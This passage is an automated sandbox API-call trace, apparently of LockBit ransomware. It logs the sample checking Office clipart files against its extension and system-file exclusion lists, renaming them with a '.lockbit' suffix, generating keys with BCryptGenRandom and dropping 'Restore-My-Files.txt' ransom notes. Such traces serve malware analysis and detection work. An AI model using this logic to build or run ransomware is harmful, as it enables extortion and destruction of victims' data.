(lpString1=".mrg", lpString2=".JPG") returned 1 [0161.309] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0161.309] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0161.309] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0161.309] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0161.309] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0161.309] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0161.309] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0161.309] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0161.309] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0161.309] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0161.309] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0161.309] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386267.JPG.lockbit") returned 72 [0161.310] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386267.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386267.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.311] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.311] malloc (_Size=0x40068) returned 0x3df0008 [0161.311] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=43294) returned 1 [0161.311] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.311] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.312] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.312] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.312] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.317] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386267.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386267.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.317] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.317] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.319] free (_Block=0x1fa2ed8) [0161.319] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386267.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.319] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.320] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.320] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661fae90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3b43, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0386270.JPG", cAlternateFileName="")) returned 1 [0161.320] lstrcmpiW (lpString1=".", lpString2="J0386270.JPG") returned -1 [0161.320] lstrcmpiW (lpString1="..", lpString2="J0386270.JPG") returned -1 [0161.320] PathFindExtensionW (pszPath="J0386270.JPG") returned=".JPG" [0161.320] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0161.320] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0161.320] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0161.320] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0161.320] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0161.320] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0161.320] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0161.320] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0161.320] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0161.320] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0161.320] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0161.320] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0161.320] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0161.320] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0161.320] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0161.320] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0161.320] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0161.321] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0161.321] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0161.321] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0161.321] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0161.321] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0161.321] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0161.321] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0161.321] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.321] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0161.321] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0161.321] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0161.321] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0161.321] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0161.321] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0161.321] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0161.321] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0161.321] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0161.321] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0161.321] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0161.321] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0161.321] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0161.321] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0161.321] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0161.321] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0161.321] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0161.321] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.321] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0161.322] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0161.322] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0161.322] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0161.322] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0386270.JPG") returned 1 [0161.322] lstrcmpiW (lpString1="ntldr", lpString2="J0386270.JPG") returned 1 [0161.322] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0386270.JPG") returned 1 [0161.322] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0386270.JPG") returned -1 [0161.322] lstrcmpiW (lpString1="autorun.inf", lpString2="J0386270.JPG") returned -1 [0161.322] lstrcmpiW (lpString1="thumbs.db", lpString2="J0386270.JPG") returned 1 [0161.322] lstrcmpiW (lpString1="iconcache.db", lpString2="J0386270.JPG") returned -1 [0161.322] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.322] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386270.JPG") returned=".JPG" [0161.322] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0161.322] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0161.322] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0161.322] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0161.322] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0161.322] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0161.322] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0161.322] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0161.322] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0161.322] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0161.322] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0161.322] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0161.322] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0161.322] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0161.323] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0161.323] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0161.323] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0161.323] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0161.323] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0161.323] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0161.323] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0161.323] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0161.323] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0161.323] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0161.323] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0161.323] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0161.323] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0161.323] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0161.323] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386270.JPG.lockbit") returned 72 [0161.323] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386270.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386270.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.325] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.325] malloc (_Size=0x40068) returned 0x3df0008 [0161.325] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=15171) returned 1 [0161.325] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.326] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.326] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.326] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.326] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.331] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386270.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386270.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.331] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.331] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0161.332] free (_Block=0x1fa2ed8) [0161.332] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386270.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.332] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.333] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.333] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661fae90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x396a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0386485.JPG", cAlternateFileName="")) returned 1 [0161.333] lstrcmpiW (lpString1=".", lpString2="J0386485.JPG") returned -1 [0161.333] lstrcmpiW (lpString1="..", lpString2="J0386485.JPG") returned -1 [0161.333] PathFindExtensionW (pszPath="J0386485.JPG") returned=".JPG" [0161.333] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0161.333] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0161.333] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0161.333] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0161.333] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0161.333] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0161.333] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0161.333] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0161.333] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0161.333] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0161.333] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0161.333] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0161.333] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0161.333] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0161.333] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0161.333] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0161.333] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0161.333] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0161.333] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0161.334] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0161.334] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0161.334] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0161.334] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0161.334] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0161.334] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.334] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0161.334] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0161.334] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0161.334] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0161.334] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0161.334] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0161.334] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0161.334] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0161.334] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0161.334] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0161.334] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0161.334] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0161.334] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0161.334] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0161.334] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0161.334] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0161.334] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0161.334] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.334] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0161.334] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0161.334] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0161.335] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0161.335] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0386485.JPG") returned 1 [0161.335] lstrcmpiW (lpString1="ntldr", lpString2="J0386485.JPG") returned 1 [0161.335] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0386485.JPG") returned 1 [0161.335] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0386485.JPG") returned -1 [0161.335] lstrcmpiW (lpString1="autorun.inf", lpString2="J0386485.JPG") returned -1 [0161.335] lstrcmpiW (lpString1="thumbs.db", lpString2="J0386485.JPG") returned 1 [0161.335] lstrcmpiW (lpString1="iconcache.db", lpString2="J0386485.JPG") returned -1 [0161.335] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.335] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386485.JPG") returned=".JPG" [0161.335] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0161.335] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0161.335] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0161.335] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0161.335] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0161.335] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0161.335] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0161.335] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0161.335] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0161.335] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0161.335] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0161.335] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0161.335] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0161.335] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0161.335] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0161.335] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0161.336] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0161.336] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0161.336] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0161.336] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0161.336] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0161.336] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0161.336] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0161.336] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0161.336] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0161.336] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0161.336] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0161.336] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0161.336] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386485.JPG.lockbit") returned 72 [0161.336] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386485.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386485.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.337] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.337] malloc (_Size=0x40068) returned 0x3df0008 [0161.337] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=14698) returned 1 [0161.337] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.338] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.338] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.338] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.338] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.343] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386485.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386485.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.343] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.343] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0161.345] free (_Block=0x1fa2ed8) [0161.345] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386485.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.345] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.345] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.345] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661fae90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x693e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0386764.JPG", cAlternateFileName="")) returned 1 [0161.345] lstrcmpiW (lpString1=".", lpString2="J0386764.JPG") returned -1 [0161.345] lstrcmpiW (lpString1="..", lpString2="J0386764.JPG") returned -1 [0161.345] PathFindExtensionW (pszPath="J0386764.JPG") returned=".JPG" [0161.345] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0161.345] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0161.345] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0161.345] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0161.345] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0161.345] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0161.345] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0161.345] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0161.345] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0161.345] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0161.345] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0161.345] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0161.346] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0161.346] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0161.346] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0161.346] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0161.346] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0161.346] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0161.346] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0161.346] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0161.346] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0161.346] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0161.346] 